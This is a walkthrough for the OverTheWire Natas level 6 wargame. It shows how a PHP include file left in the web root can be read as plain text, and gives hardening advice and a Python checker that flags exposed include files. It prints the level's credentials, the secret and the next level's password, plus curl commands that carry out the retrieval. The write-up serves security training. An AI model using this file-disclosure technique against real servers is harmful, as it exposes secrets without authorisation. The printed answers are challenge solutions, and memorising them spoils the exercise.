
Overview

Field     Value
URL       http://natas6.natas.labs.overthewire.org
Username  natas6
Password  0RoJwHdSKWFTYR5WuiAewauSuNaBXned
The page shows an “Input secret” form. Submit the wrong value and it prints “Wrong secret.” There is a “View sourcecode” link — always read the source code when it’s offered.

Hints

Read the PHP source via the “View sourcecode” link. The script doesn’t define $secret inline — it loads it from somewhere else using a PHP include. What file is being included, and what path is it at?
The included file lives at includes/secret.inc — a path relative to the web root. PHP processes .php files on the server, but .inc files may be served as plain text if the server isn’t configured to handle them. Try navigating directly to that URL in your browser.

Solution

Step 1: Read the PHP source

Click “View sourcecode”. The relevant part:
include "includes/secret.inc";

if(array_key_exists("submit", $_POST)) {
    if($secret == $_POST['secret']) {
        print "Access granted. The password for natas7 is <censored>";
    } else {
        print "Wrong secret";
    }
}
The secret is loaded from includes/secret.inc.
Step 2: Fetch the include file directly

Navigate to:
http://natas6.natas.labs.overthewire.org/includes/secret.inc
The server returns it as plain text:
<?
$secret = "FOEIUWGHFEEUHOFUOIU";
?>
Step 3: Submit the secret

Enter FOEIUWGHFEEUHOFUOIU in the form and submit.
Include and config files must never be placed inside the web root. Store them above the document root, or configure the web server to deny access to .inc files. If PHP can include it, a browser can fetch it.
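The rule "if PHP can include it, a browser can fetch it" can be turned into a static check over a code base. The following script is an added example written for this walkthrough, not code from the Natas level or from OverTheWire: it scans PHP source for include/require statements with literal paths, resolves each target against the including script's directory the way PHP does, and flags targets that land inside the document root. The sample sources, the paths /var/www/html and /var/www/private, and the assumption that the server executes only .php files (so any other extension under the web root is served as plain text) are all constructed for the example.

```python
"""Flag PHP include/require targets that resolve inside the web root.

Added example; assumes include paths are string literals, optionally
prefixed with __DIR__ . as in:
    include "includes/secret.inc";
    require_once __DIR__ . "/../private/secret.inc";
"""
import os
import re

# include/require statement with a literal path, optionally prefixed by __DIR__ .
INCLUDE_RE = re.compile(
    r"\b(?P<stmt>include_once|include|require_once|require)\s*\(?\s*"
    r"(?P<dir>__DIR__\s*\.\s*)?"
    r"['\"](?P<path>[^'\"]+)['\"]"
)

# Assumption for this example: only these extensions are executed by the server;
# anything else inside the document root is returned verbatim.
EXECUTED_EXTENSIONS = (".php",)


def resolve_include(script_path: str, path: str, uses_dir: bool) -> str:
    """Resolve an include target as PHP would for a script-relative include."""
    script_dir = os.path.dirname(script_path)
    if uses_dir:
        # __DIR__ . "/x" is string concatenation, so strip the leading slash
        # and join against the script directory.
        return os.path.normpath(os.path.join(script_dir, path.lstrip("/")))
    if os.path.isabs(path):
        return os.path.normpath(path)
    # Bare relative path: PHP consults include_path, then the script's directory.
    # The script directory is the case that matters for web exposure.
    return os.path.normpath(os.path.join(script_dir, path))


def is_under(path: str, root: str) -> bool:
    """True if path lies inside root after normalisation."""
    root = os.path.normpath(root)
    return os.path.commonpath([os.path.normpath(path), root]) == root


def audit(script_path: str, source: str, docroot: str) -> list:
    """Return one finding per include statement found in source."""
    findings = []
    for m in INCLUDE_RE.finditer(source):
        target = resolve_include(script_path, m.group("path"), bool(m.group("dir")))
        exposed = is_under(target, docroot)
        ext = os.path.splitext(target)[1].lower()
        findings.append({
            "statement": m.group("stmt"),
            "target": target,
            "web_exposed": exposed,
            # Exposed and not executed means the source is disclosed verbatim.
            "plaintext_risk": exposed and ext not in EXECUTED_EXTENSIONS,
        })
    return findings


# Constructed sample inputs: the pattern from the level, and a hardened variant
# that keeps the secret one level above the document root.
DOCROOT = "/var/www/html"
SCRIPT = "/var/www/html/index.php"
VULNERABLE_SRC = 'include "includes/secret.inc";\n'
HARDENED_SRC = 'require_once __DIR__ . "/../private/secret.inc";\n'


if __name__ == "__main__":
    for label, src in (("vulnerable", VULNERABLE_SRC), ("hardened", HARDENED_SRC)):
        for f in audit(SCRIPT, src, DOCROOT):
            status = "EXPOSED" if f["plaintext_risk"] else "ok"
            print(f"{label:10} {f['statement']:12} {f['target']}  [{status}]")
```

Run it against a checkout with the real document root and script paths substituted; any finding with plaintext_risk set is a file that belongs above the document root or behind a server rule denying its extension.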

With curl

# Step 1: retrieve the secret from the exposed include file
curl -s -u natas6:0RoJwHdSKWFTYR5WuiAewauSuNaBXned \
  http://natas6.natas.labs.overthewire.org/includes/secret.inc

# Step 2: POST the secret to the form
curl -s -u natas6:0RoJwHdSKWFTYR5WuiAewauSuNaBXned \
  -X POST -d "secret=FOEIUWGHFEEUHOFUOIU&submit=1" \
  http://natas6.natas.labs.overthewire.org/ \
  | grep -i password

Password

natas7: bmg8SvU1LizuWjx3y7xkNERkHxGre0GS